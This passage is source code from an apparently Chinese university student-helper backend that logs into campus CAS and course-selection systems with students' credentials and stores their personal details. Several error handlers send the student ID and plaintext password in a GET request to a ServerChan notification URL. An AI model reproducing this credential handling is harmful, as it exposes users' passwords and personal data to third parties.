self.library_url = 'http://ids.xcc.edu.cn/authserver/login?service=http%3A%2F%2Fopac.xcc.edu.cn%3A8080%2Freader%2Fhwthau.php'
self.st_url = ''
self.index_url = 'http://portal.xcc.edu.cn/index.portal'
self.sess = requests.Session()
self.cookies = ''
self.req = ''
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 Edg/83.0.478.54',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
def plogin(self, username, password):
try:
req = self.sess.get(self.login_url, headers=self.headers,proxies={'http':'http://192.168.3.11:2589'},timeout=5)
soup = BeautifulSoup(req.text, 'lxml')
lt = soup.find('input',{"name":"lt"}).get("value")
# print('lt:'+lt)
execution = soup.find('input',{"name":"execution"}).get("value")
# print('execution:'+execution)
eventId = soup.find('input',{"name":"_eventId"}).get("value")
# print('eventId:'+eventId)
self.cookies = self.sess.cookies
login_data = {
'username': username,
'password': password,
'lt': lt,
'execution': execution,
'_eventId': eventId,
'rmShown': "1"
}
self.req = self.sess.post(self.login_url, headers=self.headers,cookies=self.cookies,
data=login_data,allow_redirects=False)
JSESSIONID = requests.utils.dict_from_cookiejar(self.cookies)["JSESSIONID"]
try:
CASTGC = requests.utils.dict_from_cookiejar(self.cookies)["CASTGC"]
except Exception as e:
return {'err':"用户名或密码错误"}
self.st_url = self.req.headers['Location']
self.sess.get(self.st_url)
return {'JSESSIONID':JSESSIONID,'CASTGC':CASTGC}
except Exception:
traceback.print_exc()
def login(self, username, password):
try:
req = self.sess.get(self.login_url, headers=self.headers,proxies={'http':'http://192.168.3.11:2589'},timeout=5)
soup = BeautifulSoup(req.text, 'lxml')
lt = soup.find('input',{"name":"lt"}).get("value")
# print('lt:'+lt)
execution = soup.find('input',{"name":"execution"}).get("value")
# print('execution:'+execution)
eventId = soup.find('input',{"name":"_eventId"}).get("value")
# print('eventId:'+eventId)
self.cookies = self.sess.cookies
login_data = {
'username': username,
'password': password,
'lt': lt,
'execution': execution,
'_eventId': eventId,
'rmShown': "1"
}
self.req = self.sess.post(self.login_url, headers=self.headers,cookies=self.cookies,
data=login_data,allow_redirects=False,
proxies={'http':'http://192.168.3.11:2589'},timeout=5)
JSESSIONID = requests.utils.dict_from_cookiejar(self.cookies)["JSESSIONID"]
try:
CASTGC = requests.utils.dict_from_cookiejar(self.cookies)["CASTGC"]
except Exception as e:
return {'err':"用户名或密码错误"}
self.st_url = self.req.headers['Location']
self.sess.get(self.st_url,proxies={'http':'http://192.168.3.11:2589'},timeout=5)
# 图书馆cookies部分
self.req = self.sess.post(self.library_url, headers=self.headers,cookies=self.cookies,allow_redirects=False,proxies={'http':'http://192.168.3.11:2589'},timeout=5)
self.st_url = self.req.headers['Location']
ST = parse.urlparse(self.st_url).query[7:]
self.sess.get(self.st_url,proxies={'http':'http://192.168.3.11:2589'},timeout=5)
return {'JSESSIONID':JSESSIONID,'CASTGC':CASTGC,'PHPSESSID':ST}
except Exception:
traceback.print_exc()
```
#### File: zfnweb/choose/views.py
```python
import datetime
import os
import time
import json
import requests
from api import Xuanke, Login
from django.http import HttpResponse
from info.models import Students
from mp.models import Config
from info.views import update_cookies
with open('config.json', mode='r', encoding='utf-8') as f:
config = json.loads(f.read())
base_url = config["base_url"]
def index():
return HttpResponse('choose_index here')
def cacheData(xh, filename):
docurl = 'data/' + str(xh)[0:2] + '/' + str(xh) + '/'
fileurl = docurl + str(filename) + '.json'
if not os.path.exists(docurl):
os.makedirs(docurl)
else:
if not os.path.exists(fileurl):
return
else:
with open(fileurl, mode='r', encoding='utf-8') as o:
result = json.loads(o.read())
return result
def newData(xh, filename, content):
docurl = 'data/' + str(xh)[0:2] + '/' + str(xh) + '/'
fileurl = docurl + str(filename) + '.json'
if not os.path.exists(docurl):
os.makedirs(docurl)
with open(fileurl, mode='w', encoding='utf-8') as n:
n.write(content)
else:
with open(fileurl, mode='w', encoding='utf-8') as n:
n.write(content)
# if not os.path.exists(fileurl):
# with open(fileurl, mode='w', encoding='utf-8') as n:
# n.write(content)
def writeLog(content):
date = datetime.datetime.now().strftime('%Y-%m-%d')
filename = 'mylogs/' + date + '.log'
if not os.path.exists(filename):
with open(filename, mode='w', encoding='utf-8') as n:
n.write('【%s】的日志记录' % date)
with open(filename, mode='a', encoding='utf-8') as l:
l.write('\n%s' % content)
def login_pages_set(xh):
lgn = Login(base_url=base_url)
storage = lgn.login_page()
filename = ('Storage')
newData(xh, filename, json.dumps(storage, ensure_ascii=False))
def login_pages_get(xh):
filename = ('Storage')
storage = cacheData(xh, filename)
return storage
def get_kaptcha(xh):
login_pages_set(xh)
storage = login_pages_get(xh)
kaptcha = storage["kaptcha"]
return HttpResponse(json.dumps({'kaptcha':kaptcha}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_choosed(request):
"""已选课程"""
myconfig = Config.objects.all().first()
year = (myconfig.nChoose)[0:4]
term = (myconfig.nChoose)[4:]
if term == "1":
term = "3"
elif term == "2":
term = "12"
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'refresh':request.POST.get("refresh")
}
res = requests.post(url=myconfig.otherapi+"/choose/choosed",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
refresh = request.POST.get("refresh")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录访问已选课程' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
if refresh == "no":
filename = ('Choosed')
cache = cacheData(xh, filename)
if cache is not None:
# print('cache')
print('【%s】查看了已选缓存' % stu.name)
return HttpResponse(json.dumps(cache, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
pass
try:
startTime = time.time()
print('【%s】查看了已选' % stu.name)
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = Xuanke(base_url=base_url, cookies=cookies, year=year, term=term)
choosed = person.get_choosed()
endTime = time.time()
spendTime = endTime - startTime
if choosed is None:
content = ('【%s】[%s]访问已选课程出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = Xuanke(base_url=base_url, cookies=sta, year=year, term=term)
nchoosed = person.get_choosed()
filename = ('Choosed')
newData(xh, filename, json.dumps(nchoosed, ensure_ascii=False))
return HttpResponse(json.dumps(nchoosed, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif choosed.get('err'):
ServerChan = config["ServerChan"]
text = choosed.get('err')
if ServerChan == "none":
return HttpResponse(json.dumps({'err':text}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
requests.get(ServerChan + 'text=' + text)
return HttpResponse(json.dumps({'err':'已选课程未知错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]访问了已选课程,耗时%.2fs' % (
datetime.datetime.now().strftime('%H:%M:%S'), stu.name, spendTime))
writeLog(content)
filename = ('Choosed')
newData(xh, filename, json.dumps(choosed, ensure_ascii=False))
return HttpResponse(json.dumps(choosed, ensure_ascii=False),
content_type="application/json,charset=utf-8")
except Exception as e:
# print(e)
ServerChan = config["ServerChan"]
text = "已选课程未知错误"
if ServerChan == "none":
return HttpResponse(json.dumps({'err':'已选课程未知错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
requests.get(ServerChan + 'text=' + text + '&desp=' + str(e) + '\n' + str(xh) + '\n' + str(pswd))
return HttpResponse(json.dumps({'err':'已选课程未知错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_bkk_list(request):
"""板块课(通识选修课)"""
myconfig = Config.objects.all().first()
year = (myconfig.nChoose)[0:4]
term = (myconfig.nChoose)[4:]
if term == "1":
term = "3"
elif term == "2":
term = "12"
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'bkk':request.POST.get("bkk")
}
res = requests.post(url=myconfig.otherapi+"/choose/bkk",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
bkk = request.POST.get("bkk")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录访问板块课' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
try:
bkk = "1" if bkk=="2" else "2"
startTime = time.time()
print('【%s】查看了板块课' % stu.name)
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = Xuanke(base_url=base_url, cookies=cookies, year=year, term=term)
bkk_list = person.get_bkk_list(bkk)
endTime = time.time()
spendTime = endTime - startTime
if spendTime > 30:
ServerChan = config["ServerChan"]
text = "板块课超时"
if ServerChan == "none":
return HttpResponse(json.dumps({'err':'板块课超时'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
requests.get(ServerChan + 'text=' + text)
return HttpResponse(json.dumps({'err':'板块课超时'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
content = ('【%s】[%s]访问了板块课,耗时%.2fs' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name, spendTime))
writeLog(content)
return HttpResponse(json.dumps(bkk_list, ensure_ascii=False), content_type="application/json,charset=utf-8")
except Exception as e:
print(e)
content = ('【%s】[%s]访问板块课出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = Xuanke(base_url=base_url, cookies=sta, year=year, term=term)
bkk_list = person.get_bkk_list(bkk)
return HttpResponse(json.dumps(bkk_list, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def choose(request):
"""选课"""
myconfig = Config.objects.all().first()
year = (myconfig.nChoose)[0:4]
term = (myconfig.nChoose)[4:]
if term == "1":
term = "3"
elif term == "2":
term = "12"
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'doId':request.POST.get("doId"),
'kcId':request.POST.get("kcId"),
'kklxdm':request.POST.get("kklxdm")
}
res = requests.post(url=myconfig.otherapi+"/choose/choose",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
doId = request.POST.get("doId")
kcId = request.POST.get("kcId")
gradeId = '20' + str(xh)[0:2]
majorId = str(xh)[2:6]
kklxdm = request.POST.get("kklxdm")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录选课' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = Xuanke(base_url=base_url, cookies=cookies, year=year, term=term)
result = person.choose(doId, kcId, gradeId, majorId, kklxdm)
return HttpResponse(json.dumps(result, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def cancel(request):
"""取消选课"""
myconfig = Config.objects.all().first()
year = (myconfig.nChoose)[0:4]
term = (myconfig.nChoose)[4:]
if term == "1":
term = "3"
elif term == "2":
term = "12"
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'doId':request.POST.get("doId"),
'kcId':request.POST.get("kcId"),
}
res = requests.post(url=myconfig.otherapi+"/choose/cancel",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
doId = request.POST.get("doId")
kcId = request.POST.get("kcId")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录选课' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = Xuanke(base_url=base_url, cookies=cookies, year=year, term=term)
result = person.cancel(doId, kcId)
return HttpResponse(json.dumps(result, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
```
#### File: zfnweb/info/models.py
```python
from django.db import models
from django.utils.encoding import smart_str
class Students(models.Model):
studentId = models.IntegerField(verbose_name="学号",primary_key=True)
name = models.CharField(verbose_name="姓名",max_length=30)
sex = models.IntegerField(verbose_name="性别",max_length=1,choices=((1,"男"),(2,"女")),default=1)
collegeName = models.CharField(verbose_name="学院",max_length=40)
majorName = models.CharField(verbose_name="专业",max_length=40)
className = models.CharField(verbose_name="班级",max_length=40)
classMonitor = models.IntegerField(verbose_name="是否班委",choices=((0,"不是"),(1,"是")),default=0)
gpa = models.CharField(verbose_name="GPA",max_length=10,default="init")
phoneNumber = models.CharField(verbose_name="手机号",max_length=20)
birthDay = models.CharField(verbose_name="生日",max_length=20)
graduationSchool = models.CharField(verbose_name="毕业中学",max_length=40,default="init")
domicile = models.CharField(verbose_name="所在地",max_length=20,default="init")
email = models.CharField(verbose_name="邮箱",max_length=36,default="init")
national = models.CharField(verbose_name="民族",max_length=6,default="init")
idNumber = models.CharField(verbose_name="身份证号码",max_length=20,default="init")
JSESSIONID = models.CharField(max_length=60)
route = models.CharField(max_length=80)
searchTimes = models.CharField(verbose_name="查询次数",max_length=30,default="2020-01-01,3")
refreshTimes = models.IntegerField(verbose_name="访问次数",default=0)
updateTime = models.CharField(verbose_name="最后登录",max_length=40)
def __str__(self):
return smart_str('%s-%s' % (self.studentId, self.name))
@classmethod
def create(cls,studentId,name,sex,collegeName,majorName,className,phoneNumber,birthDay,graduationSchool,domicile,email,national,idNumber,JSESSIONID,route,updateTime):
return cls(studentId=studentId, name=name, sex=sex, collegeName=collegeName, majorName=majorName, className=className, phoneNumber=phoneNumber, birthDay=birthDay, graduationSchool=graduationSchool, domicile=domicile, email=email, national=national, idNumber=idNumber, JSESSIONID=JSESSIONID, route=route, updateTime=updateTime)
class Meta:
db_table = "students"
verbose_name = '学生'
verbose_name_plural = '学生'
class Teachers(models.Model):
name = models.CharField(verbose_name="姓名",max_length=20)
sex = models.CharField(verbose_name="性别",max_length=20,default="-")
collegeName = models.CharField(verbose_name="学院",max_length=40,default="-")
title = models.CharField(verbose_name="职称",max_length=40,default="-")
phoneNumber = models.CharField(verbose_name="手机号",max_length=20)
QQ = models.CharField(verbose_name="QQ号码",max_length=20,default="-")
wechat = models.CharField(verbose_name="微信",max_length=20,default="-")
def __str__(self):
return smart_str('%s-%s' % (self.collegeName, self.name))
# @classmethod
# def create(cls,name,collegeName,phoneNumber):
# return cls(name=name,collegeName=collegeName,phoneNumber=phoneNumber)
class Meta:
db_table = "teachers"
verbose_name = '教师'
verbose_name_plural = '教师'
```
#### File: zfnweb/info/views.py
```python
import datetime
import os
import time
import traceback
import json
import requests
import openpyxl
from bs4 import BeautifulSoup
from api import GetInfo, Login, PLogin, Personal, Infos, Search
from django.utils.encoding import escape_uri_path
from django.http import HttpResponse, JsonResponse, FileResponse
from info.models import Students, Teachers
from mp.models import Config
from openpyxl.styles import Font, colors, Alignment
with open('config.json', mode='r', encoding='utf-8') as f:
config = json.loads(f.read())
base_url = config["base_url"]
def index(request):
return HttpResponse('info_index here')
def calSex(id):
sexNum = id[16:17]
if int(sexNum)%2==0:
return 2
else:
return 1
def diffList(list1,list2):
return [x for x in list1 if x not in list2]
def mywarn(text,desp,xh,pswd):
ServerChan = config["ServerChan"]
text = text
errData = {'err':text+',请返回重试'} if "错误" in text else {'err':text+',建议访问一下“课程通知”以便刷新cookies'}
if ServerChan == "none":
return HttpResponse(json.dumps(errData, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
requests.get(ServerChan + 'text=' + text + '&desp=' + desp + '\n' + str(xh) + '\n' + str(pswd))
return HttpResponse(json.dumps(errData, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def cacheData(xh, filename):
docurl = 'data/' + str(xh)[0:2] + '/' + str(xh) + '/'
fileurl = docurl + str(filename) + '.json'
if not os.path.exists(docurl):
os.makedirs(docurl)
else:
if not os.path.exists(fileurl):
return
else:
with open(fileurl, mode='r', encoding='utf-8') as o:
result = json.loads(o.read())
if result.get("err"):
return
return result
def newData(xh, filename, content):
docurl = 'data/' + str(xh)[0:2] + '/' + str(xh) + '/'
fileurl = docurl + str(filename) + '.json'
if not os.path.exists(docurl):
os.makedirs(docurl)
with open(fileurl, mode='w', encoding='utf-8') as n:
n.write(content)
else:
with open(fileurl, mode='w', encoding='utf-8') as n:
n.write(content)
# if not os.path.exists(fileurl):
# with open(fileurl, mode='w', encoding='utf-8') as n:
# n.write(content)
def writeLog(content):
date = datetime.datetime.now().strftime('%Y-%m-%d')
filename = 'mylogs/' + date + '.log'
if not os.path.exists(filename):
with open(filename, mode='w', encoding='utf-8') as n:
n.write('【%s】的日志记录' % date)
with open(filename, mode='a', encoding='utf-8') as l:
l.write('\n%s' % content)
def login_pages_set(xh):
lgn = Login(base_url=base_url)
storage = lgn.login_page()
filename = ('Storage')
newData(xh, filename, json.dumps(storage, ensure_ascii=False))
def login_pages_get(xh):
filename = ('Storage')
storage = cacheData(xh, filename)
return storage
def get_kaptcha_net(request):
xh = request.GET.get("xh")
login_pages_set(xh)
storage = login_pages_get(xh)
kaptcha = storage["kaptcha"]
return HttpResponse(json.dumps({'kaptcha':kaptcha}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_kaptcha(xh):
myconfig = Config.objects.all().first()
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
login_pages_set(xh)
storage = login_pages_get(xh)
kaptcha = storage["kaptcha"]
return HttpResponse(json.dumps({'kaptcha':kaptcha}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def update_cookies(request):
myconfig = Config.objects.all().first()
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
try:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
kaptcha = request.POST.get("kaptcha")
stu = Students.objects.get(studentId=int(xh))
refreshTimes = int(stu.refreshTimes)
startTime = time.time()
content = ('【%s】[%s]更新cookies' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
# print('原cookies:')
# print('{JSESSIONID:%s,route:%s}' % (stu.JSESSIONID,stu.route))
lgn = Login(base_url=base_url)
if myconfig.isKaptcha:
storage = login_pages_get(xh)
if storage is None:
return get_kaptcha(xh)
lgn.login_kaptcha(storage["cookies"],xh, pswd,storage["tokens"],storage["n"],storage["e"],kaptcha)
else:
lgn.login(xh, pswd)
if lgn.runcode == 1:
cookies = lgn.cookies
# person = GetInfo(base_url=base_url, cookies=cookies)
NJSESSIONID = requests.utils.dict_from_cookiejar(cookies)["JSESSIONID"]
if myconfig.isKaptcha:
nroute = storage["cookies"]["route"]
else:
nroute = requests.utils.dict_from_cookiejar(cookies)["route"]
ncookies = requests.utils.cookiejar_from_dict({"JSESSIONID":NJSESSIONID,"route":nroute})
updateTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
refreshTimes += 1
Students.objects.filter(studentId=int(xh)).update(JSESSIONID=NJSESSIONID, route=nroute,
refreshTimes=refreshTimes, updateTime=updateTime)
endTime = time.time()
spendTime = endTime - startTime
# print('新cookies:')
content = ('【%s】更新cookies成功,耗时%.2fs' % (datetime.datetime.now().strftime('%H:%M:%S'), spendTime))
writeLog(content)
person = GetInfo(base_url=base_url, cookies=ncookies)
pinfo = person.get_pinfo()
if stu.email == "无":
Students.objects.filter(studentId=int(xh)).update(email=pinfo["email"])
# print(pinfo)
filename = ('Pinfo')
newData(xh, filename, json.dumps(pinfo, ensure_ascii=False))
# print(requests.utils.dict_from_cookiejar(cookies))
if myconfig.isKaptcha:
return HttpResponse(json.dumps({'success':'更新cookies成功'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return cookies
elif lgn.runcode == 4:
return HttpResponse(json.dumps({'err':'验证码错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]更新cookies时网络或其他错误!' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'网络或token问题,请返回重试'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
except Exception as e:
if str(e) == "'NoneType' object has no attribute 'get'":
return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return update_cookies(xh, pswd)
else:
traceback.print_exc()
return mywarn("更新cookies未知错误",str(e),xh,pswd)
def writeToExcel(json,saveUrl):
lastCourses = json["lastCourses"]
res = json["res"]
excel = openpyxl.Workbook()
sheet1 = excel.create_sheet('sheet1', index=0)
sheet1.cell(row=1,column=1,value="学号").alignment = Alignment(horizontal='center', vertical='center')
sheet1.cell(row=1,column=2,value="姓名").alignment = Alignment(horizontal='center', vertical='center')
sheet1.column_dimensions['A'].width = 15
for c in range(0,len(lastCourses)):
sheet1.cell(row=1, column=c + 3, value=lastCourses[c]).alignment = Alignment(horizontal='center', vertical='center')
# sheet1.column_dimensions[chr(67+c)].width = 8
for items in range(0,len(res)):
sheet1.cell(row=items+2,column=1,value=res[items]["xh"]).alignment = Alignment(horizontal='center', vertical='center')
sheet1.cell(row=items+2,column=2,value=res[items]["name"]).alignment = Alignment(horizontal='center', vertical='center')
for n in range(0,len(res[items]["grades"])):
for cs in range(0,len(lastCourses)):
if res[items]["grades"][n]["n"] == lastCourses[cs]:
try:
sheet1.cell(row=items+2,column=cs+3,value=int(res[items]["grades"][n]["g"])).alignment = Alignment(horizontal='center', vertical='center')
except:
sheet1.cell(row=items+2,column=cs+3,value=res[items]["grades"][n]["g"]).alignment = Alignment(horizontal='center', vertical='center')
sheet1.merge_cells(start_row=len(res)+2, start_column=1, end_row=len(res)+5, end_column=6)
sheet1.cell(row=len(res)+2,column=1,value="1.表中数据来源须该班同学使用“西院助手”小程序访问并刷新该学期成绩\n2.留空为该同学还未刷新到最新,未使用小程序不会显示该同学行\n3.该表成绩为教务系统获取成绩,真实有效").alignment = Alignment(horizontal='center', vertical='center')
sheet1.merge_cells(start_row=len(res)+2, start_column=7, end_row=len(res)+5, end_column=10)
sheet1.cell(row=len(res)+2,column=7,value="生成时间:%s" % time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))).alignment = Alignment(horizontal='center', vertical='center')
excel.save(saveUrl)
def get_pinfo(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'kaptcha':request.POST.get("kaptcha")
}
res = requests.post(url=myconfig.otherapi+"/info/pinfo",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if mpconfig["loginbad"]:
# return HttpResponse(json.dumps({'err':'当前教务系统无法请求登录,请待学校修复!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
kaptcha = request.POST.get("kaptcha")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if Students.objects.filter(studentId=int(xh)):
stu = Students.objects.get(studentId=int(xh))
refreshTimes = int(stu.refreshTimes)
try:
startTime = time.time()
lgn = Login(base_url=base_url)
if myconfig.isKaptcha:
storage = login_pages_get(xh)
if storage is None:
return get_kaptcha(xh)
lgn.login_kaptcha(storage["cookies"],xh, pswd,storage["tokens"],storage["n"],storage["e"],kaptcha)
else:
lgn.login(xh, pswd)
if lgn.runcode == 1:
cookies = lgn.cookies
JSESSIONID = requests.utils.dict_from_cookiejar(cookies)["JSESSIONID"]
if myconfig.isKaptcha:
route = storage["cookies"]["route"]
else:
route = requests.utils.dict_from_cookiejar(cookies)["route"]
ncookies = requests.utils.cookiejar_from_dict({"JSESSIONID":JSESSIONID,"route":route})
person = GetInfo(base_url=base_url, cookies=ncookies)
pinfo = person.get_pinfo()
if pinfo.get("idNumber")[-6:] == pswd:
return HttpResponse(json.dumps({'err':"新生或专升本同学请在教务系统(jwxt.xcc.edu.cn)完善信息并审核且修改密码后登陆小程序!"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if pinfo.get('err'):
if pinfo.get('err') == "Connect Timeout":
return mywarn("登录超时","",xh,pswd)
else:
return pinfo
refreshTimes += 1
updateTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
Students.objects.filter(studentId=int(xh)).update(JSESSIONID=JSESSIONID, route=route,
refreshTimes=refreshTimes, updateTime=updateTime)
endTime = time.time()
spendTime = endTime - startTime
print('【%s】登录了' % pinfo["name"])
content = ('【%s】[%s]第%d次访问登录了,耗时%.2fs' % (
datetime.datetime.now().strftime('%H:%M:%S'), pinfo["name"], refreshTimes, spendTime))
writeLog(content)
filename = ('Pinfo')
newData(xh, filename, json.dumps(pinfo, ensure_ascii=False))
return HttpResponse(json.dumps(pinfo, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif lgn.runcode == 4:
return HttpResponse(json.dumps({'err':'验证码错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif lgn.runcode == 2:
content = ('【%s】[%s]在登录时学号或者密码错误!' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'学号或者密码错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]在登录时网络或其它错误!' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'网络或token问题,请返回重试'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
except Exception as e:
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return get_pinfo(request)
return HttpResponse(json.dumps({'err':"请重新刷新一下"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]登录时出错' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
traceback.print_exc()
return mywarn("登录未知错误",str(e),xh,pswd)
else:
try:
startTime = time.time()
lgn = Login(base_url=base_url)
if myconfig.isKaptcha:
storage = login_pages_get(xh)
if storage is None:
return get_kaptcha(xh)
